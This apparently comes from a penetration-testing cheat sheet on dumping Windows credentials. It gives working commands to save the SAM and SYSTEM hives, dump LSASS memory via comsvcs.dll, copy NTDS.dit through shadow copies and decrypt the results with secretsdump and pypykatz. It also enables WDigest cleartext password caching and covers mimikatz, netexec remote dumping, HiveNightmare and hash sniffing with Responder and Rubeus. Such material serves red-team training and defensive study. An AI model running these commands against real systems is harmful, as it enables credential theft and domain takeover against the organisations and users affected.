TerminalCode

Extract Hash & Password

Attacks that allow obtaining NTLM hashes of local users or Active Directory domain users.

General Info

Database

SAM (Security Account Manager)

Hash format

LM (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total) NTLM (MD4)

Authentication protocols

NTLMv1 (uses LM and NTLM hashes) NTLMv2 (uses NTLM hashes) Kerberos

Process

LSASS (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc.

NTDS.dit

Each Domain Controller in Active Directory keeps this database file synchronized, which contains a lot of information including usernames and password hashes (SAM is used only for logins on the device with local accounts)

SAM Hashes

To extract hashes from the SAM database we need:

  • Administrator Privileges

  • hklm\sam contains the password hashes.

  • hklm\system contains the bootkey needed to decrypt the SAM db.

  • hklm\security contains cached credentials for domain accounts.

Get File

Create copies for transfer

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Extract

Extracting hashes from the SAM database in offline mode by having the files. Use impacket-secretsdump.

secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL

LSASS Hashes

To extract hashes from the LSASS process we need:

  • Administrator Privileges

  • Dump of the running process

Get File

Create a copy for transfer

Task Manager > Right-click on LSAProcess > Create dump file

Or

tasklist /svc or Get-Process lsass
# get PID LSASS
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dump full

Extract

Extracting hashes from the LSASS process dump in offline mode by having the files. Use pypykatz.

pypykatz lsa minidump lsass.dump

NTDS Hashes

To extract hashes from the NTDS.dit file we need::

  • Connect to a Domain Controller

  • Have Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights (or equivalent)

  • hklm\system contains the bootkey needed for decryption

Get File

Create a copy for transfer

vssadmin CREATE SHADOW /For=C:

Or

vshadow.exe -nw -p C:
# get PATH
cmd.exe /c copy <PATH>\Windows\NTDS\NTDS.dit c:\NTDS.dit

Extract

Extract hashes from NTDS.dit file offline, having the files. Use impacket-secretsdump.

secretsdump.py -ntds NTDS.dit -system system.save LOCAL

UseLogonCredential Registry Key

We need to enable that Registry Key UseLogonCredential to be able to extract Clear Password

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

And reboot 

shutdown /r /t 0 /f

Store Password using Reversible Encryption

When this option is set on a user account, the passwords are stored using RC4 encryption with the key stored in the registry (the Syskey) that can be extracted by a Domain Admin or equivalent. Tools such as impacket-secretsdump.py will decrypt any passwords stored using reversible encryption while dumping the NTDS file either as a Domain Admin or using an attack such as DCSync.

Enumeration

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

With PowerView (Old and New) 

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

With Tools

Tool
Details

netexec

Remotly nxc smb <IP> --local-auth -u <USER> -p <PASS> --sam --lsa nxc smb <IP_DC> -u <USER> -p <PASS> --ntds

mimikatz

On Host (need SeDebugPrivilege active, in addition to administrator privileges)

.\mimikatz.exe

> privilege::debug > lsadump::sam > lsadump::lsa > lsadump::secrets > vault::cred > sekurlsa::credman > sekurlsa::logonpasswords full (see UseLogonCredential Registry Key )

For All Moduls see HERE. For Meterpreter RevShell: load kiwi

impacket-secretsdump

secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>

HiveNightmare

Create a copy of the SAM files, System, Security from any user even unprivileged. CVE-2021-36934 - SeriousSam .\HiveNightmare.exe

Sniffing

Tool
Details

responder

Linux sudo responder -I <INTERFACE> sudo responder -I <INTERFACE> -A (passive analysis mode) See /usr/share/responder/logs

Inveigh

Windows PowerShell version (no longer maintained) Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y C# version .\Inveigh.exe [ESC] > HELP

rubeus

Windows (sniff TGT and TGS, usefull on services account) Requires elevated privileges Rubeus.exe monitor /interval:1 /nowrap Save output in file "ticket.bs4.kirbi" then cat ticket.bs4.kirbi | base64 -d > ticket.kirbi

ticketConverter.py ticket.kirbi user.ccache

If we have access to the target we can use net use \<IP_Attacker>\share

Last updated

Was this helpful?